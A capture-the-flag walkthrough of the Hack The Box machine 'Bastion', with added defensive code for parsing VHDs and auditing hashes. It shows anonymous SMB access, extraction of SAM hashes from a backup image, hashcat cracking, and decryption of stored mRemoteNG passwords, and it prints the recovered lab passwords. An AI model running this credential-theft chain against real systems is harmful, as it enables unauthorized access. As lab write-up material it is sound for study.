HTB Bastion

$nmap -A -p- -T4 10.10.10.134

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 08:49 CET
Nmap scan report for 10.10.10.134
Host is up (0.036s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-03T08:50:53+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-03T07:50:49
|_  start_date: 2020-12-03T07:47:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.94 seconds

Open ports:

  • 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
  • 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 49664/tcp open msrpc Microsoft Windows RPC
  • 49665/tcp open msrpc Microsoft Windows RPC
  • 49666/tcp open msrpc Microsoft Windows RPC
  • 49667/tcp open msrpc Microsoft Windows RPC
  • 49668/tcp open msrpc Microsoft Windows RPC
  • 49669/tcp open msrpc Microsoft Windows RPC
  • 49670/tcp open msrpc Microsoft Windows RPC

As the SMB port is open, let's check it.

$smbclient -N -L \\10.10.10.134\

Sharename       Type      Comment
--------       ----      -------
ADMIN$          Disk      Remote Admin
Backups         Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC

SMB1 disabled -- no workgroup available

We can access the Backups share.

$smbclient -N \\10.10.10.134\Backups

Try "help" to get a list of possible commands.
smb: \> dir
.                                   D        0  Tue Apr 16 12:02:11 2019
..                                  D        0  Tue Apr 16 12:02:11 2019
note.txt                           AR      116  Tue Apr 16 12:10:09 2019
SDT65CB.tmp                         A        0  Fri Feb 22 13:43:08 2019
WindowsImageBackup                 Dn        0  Fri Feb 22 13:44:02 2019

735807 blocks of size 4096. 2763904 blocks available

smb: \> mget note.txt

Get file note.txt? yes
getting file \note.txt of size 116 as note.txt (0,7 KiloBytes/sec) (average 0,7 KiloBytes/sec)

smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup> dir

.                                  Dn        0  Fri Feb 22 13:44:02 2019
..                                 Dn        0  Fri Feb 22 13:44:02 2019
L4mpje-PC                          Dn        0  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763904 blocks available

smb: \WindowsImageBackup> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC> dir

.                                  Dn        0  Fri Feb 22 13:45:32 2019
..                                 Dn        0  Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351           Dn        0  Fri Feb 22 13:45:32 2019
Catalog                            Dn        0  Fri Feb 22 13:45:32 2019
MediaId                            An       16  Fri Feb 22 13:44:02 2019
SPPMetadataCache                   Dn        0  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763901 blocks available

smb: \WindowsImageBackup\L4mpje-PC> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351> dir

.                                  Dn        0  Fri Feb 22 13:45:32 2019
..                                 Dn        0  Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 13:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 13:45:32 2019
BackupSpecs.xml                    An     1186  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 13:45:32 2019

7735807 blocks of size 4096. 2763389 blocks available

We find two .vhd files.

A VHD file is a Virtual Hard Disk, a container format for a complete disk image. More information can be found at
https://en.wikipedia.org/wiki/VHD_(file_format)
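Before deciding how to handle an image like this, it helps to know what it actually contains: a VHD keeps a 512-byte footer at the end of the file that records the virtual disk size, whether the disk is fixed or dynamic (a dynamic image is far smaller on disk than the volume it presents), and a checksum. The following parser is an added example, not code from the original post; the field layout follows the public VHD specification, the sample footer it builds is constructed, and the helper names (inspect_vhd, build_footer) are my own.

```python
import struct
import uuid

# VHD footer: 512 big-endian bytes at the end of the image (dynamic and
# differencing disks also carry a copy at offset 0). Field order follows the
# Microsoft VHD specification.
FOOTER_SIZE = 512
FOOTER_STRUCT = struct.Struct(">8sIIQI4sIIQQHBBII16sB427s")
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}
CHECKSUM_OFFSET = 64


def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum of the footer with the checksum field zeroed."""
    zeroed = footer[:CHECKSUM_OFFSET] + b"\x00" * 4 + footer[CHECKSUM_OFFSET + 4:]
    return (~sum(zeroed)) & 0xFFFFFFFF


def parse_footer(footer: bytes) -> dict:
    """Decode the footer and report the values that matter before mounting."""
    if len(footer) != FOOTER_SIZE:
        raise ValueError("footer must be exactly %d bytes" % FOOTER_SIZE)
    f = FOOTER_STRUCT.unpack(footer)
    if f[0] != b"conectix":
        raise ValueError("not a VHD footer: bad cookie %r" % f[0])
    return {
        "format_version": "%d.%d" % (f[2] >> 16, f[2] & 0xFFFF),
        "disk_type": DISK_TYPES.get(f[13], "unknown(%d)" % f[13]),
        "virtual_size": f[9],          # size of the disk the OS will see once mounted
        "original_size": f[8],
        "data_offset": f[3],           # 0xFFFFFFFFFFFFFFFF for fixed disks
        "creator_app": f[5].decode("ascii", "replace").strip("\x00"),
        "unique_id": str(uuid.UUID(bytes=f[15])),
        "saved_state": bool(f[16]),
        "checksum_ok": f[14] == vhd_checksum(footer),
    }


def build_footer(virtual_size: int, disk_type: int = 3) -> bytes:
    """Construct a valid footer for demonstration; these values are made up, not from a real image."""
    data_offset = 0xFFFFFFFFFFFFFFFF if disk_type == 2 else 512
    fields = [
        b"conectix", 0x2, 0x00010000, data_offset, 0, b"demo", 0x00010000,
        0x5769326B,                      # creator host OS "Wi2k"
        virtual_size, virtual_size, 65535, 16, 255, disk_type, 0,
        uuid.UUID(int=0x1234).bytes, 0, b"\x00" * 427,
    ]
    fields[14] = vhd_checksum(FOOTER_STRUCT.pack(*fields))
    return FOOTER_STRUCT.pack(*fields)


def inspect_vhd(path: str) -> dict:
    """Read only the trailing 512 bytes, so a multi-GB image on a slow share costs one small read."""
    with open(path, "rb") as fh:
        fh.seek(-FOOTER_SIZE, 2)
        return parse_footer(fh.read(FOOTER_SIZE))


if __name__ == "__main__":
    import os
    import tempfile
    with tempfile.NamedTemporaryFile("wb", suffix=".vhd", delete=False) as tmp:
        tmp.write(b"\x00" * 4096)               # stand-in for the image body
        tmp.write(build_footer(40 * 2**30))     # constructed 40 GiB dynamic disk
    print(inspect_vhd(tmp.name))
    os.unlink(tmp.name)
```

Run against a path under the CIFS mount set up later in the post, inspect_vhd reads a single sector from the share instead of the whole image, which is exactly the constraint note.txt puts on us. A footer whose checksum does not verify, or whose cookie is not "conectix", is a hint that the file is truncated or is not really a VHD, and is worth knowing before handing it to qemu-nbd.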

As the file note.txt says:

$cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

We can't download these files to our local box, so we need to find a different approach.

Searching on Google, we find ways to mount these files remotely, directly over the share.

https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

https://www.jamescoyle.net/tag/qemu-nbd

$cd /mnt/
$sudo mkdir remote
$sudo mount -t cifs //10.10.10.134/Backups/ /mnt/remote/ -o rw
$cd remote/
$ls

note.txt  SDT65CB.tmp  WindowsImageBackup

$cd WindowsImageBackup/
$ls

L4mpje-PC

$cd L4mpje-PC/
$ls

'Backup 2019-02-22 124351'   Catalog   MediaId   SPPMetadataCache

$cd Backup\ 2019-02-22\ 124351/
$ls

9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

$cd /mnt/
$ls

remote

$sudo mkdir vhd
$qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

qemu-nbd: Failed to open /dev/nbd0: No such file or directory
qemu-nbd: Disconnect client, due to: Failed to read request: Unexpected end-of-file before all bytes were read

$cd /dev/
$sudo modprobe nbd

$sudo qemu-nbd -r -c /dev/nbd0 /mnt/remote/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
$sudo mount -r /dev/nbd0p1 /mnt/vhd
$cd /mnt/vhd/
$ls

'$Recycle.Bin'   autoexec.bat   config.sys  'Documents and Settings'   pagefile.sys   PerfLogs  'Program Files'   ProgramData   Recovery  'System Volume Information'   Users   Windows

$cd Users/L4mpje/Desktop
$ls

desktop.ini

There is no user flag here.
Let's then perform a more in-depth analysis of the Windows system image.

One of the first elements to check is the Security Account Manager (SAM) database, stored as a registry hive under Windows\System32\config.
https://en.wikipedia.org/wiki/Security_Account_Manager

$ls -la

total 74740
drwxrwxrwx 1 root root    12288 feb 22  2019 .
drwxrwxrwx 1 root root   655360 feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 feb 22  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 feb 22  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root   524288 jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 abr 12  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 abr 12  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 jul 14  2009 Journal
drwxrwxrwx 1 root root        0 feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 abr 12  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 abr 12  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 abr 12  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 abr 12  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 jul 14  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 nov 20  2010 systemprofile
drwxrwxrwx 1 root root     4096 feb 22  2019 TxR

We have access to the SAM and SYSTEM hives.
Together they can be used to extract the local account password hashes and obtain deeper access.

$samdump2 SYSTEM SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Let’s crack L4mpje’s hash.

$hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 2868/2932 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

26112010952d963c8dc4217daec986d9:bureaulampje    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
Time.Started.....: Thu Dec  3 11:09:03 2020 (8 secs)
Time.Estimated...: Thu Dec  3 11:09:11 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1398.6 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9396224/14344385 (65.50%)
Rejected.........: 0/9396224 (0.00%)
Restore.Point....: 9394176/14344385 (65.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: burlfish85 -> burbank105

Started: Thu Dec  3 11:08:39 2020
Stopped: Thu Dec  3 11:09:12 2020

The password is bureaulampje.
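Two details of the samdump2 output explain why this went so fast. The NT hash is simply MD4 over the UTF-16LE encoding of the password, with no salt: that is why the two disabled accounts show the identical value 31d6cfe0d16ae931b73c59d7e0c089c0 (the hash of an empty password), and why a wordlist can be tried at over a million candidates per second on a laptop CPU. The example below is added here and is not from the original post; it carries a pure-Python MD4 (RFC 1320) so it runs without a legacy OpenSSL provider, reproduces the hashes on the page, and audits a pwdump-style listing for the things a defender wants flagged: blank passwords, LM hashes still present, and enabled accounts that share a password. The three page lines are real; the legacy and svc_backup lines and the function names are constructed for the demo.

```python
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _md4_compress(state, block):
    X = struct.unpack("<16I", block)
    v = list(state)
    rounds = (
        # (mixing function, round constant, shift table, message word order) per RFC 1320
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for func, const, shifts, order in rounds:
        for i, k in enumerate(order):
            a = (-i) % 4                      # rotate which register is updated: a, d, c, b
            b, c, d = (a + 1) % 4, (a + 2) % 4, (a + 3) % 4
            v[a] = _rotl((v[a] + func(v[b], v[c], v[d]) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
    return tuple((s + t) & 0xFFFFFFFF for s, t in zip(state, v))


def md4(data: bytes) -> bytes:
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)     # bit length, little-endian
    for off in range(0, len(msg), 64):
        state = _md4_compress(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 of the UTF-16LE password, as stored in the SAM."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = nt_hash("")                           # 31d6cfe0d16ae931b73c59d7e0c089c0


def parse_pwdump_line(line: str) -> dict:
    """Parse 'user:rid:lm:nt:::' as printed by samdump2, with its optional '*disabled*' prefix."""
    disabled = line.startswith("*disabled*")
    if disabled:
        line = line.split(None, 1)[1]
    user, rid, lm, nt = line.strip().rstrip(":").split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(), "disabled": disabled}


def audit_dump(lines) -> dict:
    """Return {user: [findings]} for blank passwords, LM hashes and shared passwords."""
    accounts = [parse_pwdump_line(l) for l in lines if l.strip()]
    report = {a["user"]: [] for a in accounts}
    by_nt = {}
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            report[a["user"]].append("blank NT password" + (" (account disabled)" if a["disabled"] else ""))
        elif not a["disabled"]:
            by_nt.setdefault(a["nt"], []).append(a["user"])   # unsalted, so equal hash == equal password
        if a["lm"] != EMPTY_LM:
            report[a["user"]].append("LM hash present")
    for users in by_nt.values():
        if len(users) > 1:
            for u in users:
                report[u].append("shares NT hash with " + ", ".join(x for x in users if x != u))
    return report


SAMPLE_DUMP = [
    # The three lines below are the samdump2 output shown on the page.
    "*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::",
    # Constructed lines (not from the page) to exercise the LM and shared-password checks.
    "legacy:1001:0123456789abcdef0123456789abcdef:" + nt_hash("Summer2019") + ":::",
    "svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("Summer2019") + ":::",
]

if __name__ == "__main__":
    print("NT hash of the cracked password:", nt_hash("bureaulampje"))
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(user, findings or ["ok"])
```

The md4 function is the only non-trivial piece; everything else is bookkeeping over the dump format. The practical point for defenders is that every check here runs in microseconds because nothing in the scheme slows an attacker down, so the only real controls are password length and policy, disabling LM hash storage, and keeping SAM and SYSTEM out of places like a world-readable backup share.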

Now we just need to log in over SSH to L4mpje's account.

$ssh L4mpje@10.10.10.134

L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

9bfeXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Let's now look for the Administrator flag.

PS C:\Program Files (x86)> dir

Directory: C:\Program Files (x86)                                                                                           

Mode          LastWriteTime     Length 	Name                                                                           
----          -------------     ------ 	----                                                                           
d-----        16-7-2016     	15:23   Common Files                                                                   
d-----        23-2-2019     	09:38   Internet Explorer                                                              
d-----        16-7-2016     	15:23   Microsoft.NET                                                                  
da----        22-2-2019     	14:01   mRemoteNG                                                                      
d-----        23-2-2019     	10:22   Windows Defender                                                               
d-----        23-2-2019     	09:38   Windows Mail                                                                   
d-----        23-2-2019     	10:22   Windows Media Player                                                           
d-----        16-7-2016     	15:23   Windows Multimedia Platform                                                    
d-----        16-7-2016     	15:23   Windows NT                                                                     
d-----        23-2-2019     	10:22   Windows Photo Viewer                                                           
d-----        16-7-2016     	15:23   Windows Portable Devices                                                       
d-----        16-7-2016     	15:23   WindowsPowerShell                                                              

PS C:\Program Files (x86)>

There is an installation of mRemoteNG.

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.

https://mremoteng.org/

PS C:\Program Files (x86)\mRemoteNG> type .\Changelog.txt

1.76.11 (2018-10-18):                                                                                                           

Fixes:                                                                                                                          
------                                                                                                                          
#1139: Feature "Reconnect to previously opened sessions" not working                                                            
#1136: Putty window not maximized                                                                                               

1.76.10 (2018-10-07):                                                                                                           

Fixes:                                                                                                                          
------                                                                                                                          
#1124: Enabling themes causes an exception                                                                                      

1.76.9 (2018-10-07):                                                                                                            

Fixes:                                                                                                                          
------                                                                                                                          
#1117: Duplicate panel created when "Reconnect on Startup" and "Create Empty Panel" settings enabled                            
#1115: Exception when changing from xml data storage to SQL

According to this file, the installed mRemoteNG version is 1.76.11.

As the following article explains, this version stores connection passwords insecurely:
https://hackersvanguard.com/mremoteng-insecure-password-storage/

$scp l4mpje@10.10.10.134:./AppData/Roaming/mRemoteNG/confCons.xml .

l4mpje@10.10.10.134's password: 
confCons.xml                                                                                                                                       100% 6316   154.2KB/s   00:00

$ls

confCons.xml  hash.txt

$cat confCons.xml

<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">

    <Node 
        Name="DC" 
        Type="Connection" 
        Descr="" Icon="mRemoteNG" 
        Panel="General" 
        Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" 
        Username="Administrator" 
        Domain="" 
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 
        Hostname="127.0.0.1" 
        Protocol="RDP" 
		...

We can now decrypt the password with the following tool:
https://github.com/haseebT/mRemoteNG-Decrypt

$wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py

--2020-12-03 12:24:53--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1535 (1,5K) [text/plain]
Grabando a: “mremoteng_decrypt.py”

mremoteng_decrypt.py                                              100%[=============================================================================================================================================================>]   1,50K  --.-KB/s    en 0s      

2020-12-03 12:24:53 (4,42 MB/s) - “mremoteng_decrypt.py” guardado [1535/1535]

$python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Password: thXLHM96BeKL0ER2

The Administrator password is then thXLHM96BeKL0ER2.
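What made this trivial is visible in the header of confCons.xml itself: FullFileEncryption="false" means every hostname, username and protocol is in clear text and only the Password attributes are encrypted, and unless the user set a custom master password in mRemoteNG's options, those attributes are encrypted under a publicly documented default key, which is why the decrypt script needed nothing but the ciphertext. The following audit is an added example, not part of the original post or of mRemoteNG: it inventories a connections file statically with the standard library, reporting the encryption settings and every node that carries a stored credential. The sample file reuses the header attributes and the DC node from the page with placeholder ciphertext, plus a constructed container and SSH node; the 10000-iteration threshold is the example's own assumption, not an mRemoteNG default. A static check cannot tell whether a custom master password is in use; that requires an AES-GCM decrypt attempt against the Protected attribute, which is what the tool above does.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the confCons.xml layout seen on the page. Header attributes and
# the "DC" node mirror the page (ciphertexts replaced by placeholders); "Lab/jump" is made up.
SAMPLE_CONFCONS = """<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
    Protected="PLACEHOLDER_PROTECTED_BLOCK" ConfVersion="2.6">
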